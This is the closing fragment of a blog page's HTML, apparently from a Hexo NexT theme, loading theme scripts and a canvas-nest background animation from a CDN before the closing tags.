  <script type="text/javascript" src="/js/src/scrollspy.js?v=6.6.0"></script>
<script type="text/javascript" src="/js/src/post-details.js?v=6.6.0"></script>



  


  <script type="text/javascript" src="/js/src/bootstrap.js?v=6.6.0"></script>



  



  










  





  

  

  

  

  

  
  

  

  

  

  

  

  

  
<script type="text/javascript" src="//cdn.bootcss.com/canvas-nest.js/1.0.0/canvas-nest.min.js"></script>

</body>
</html>
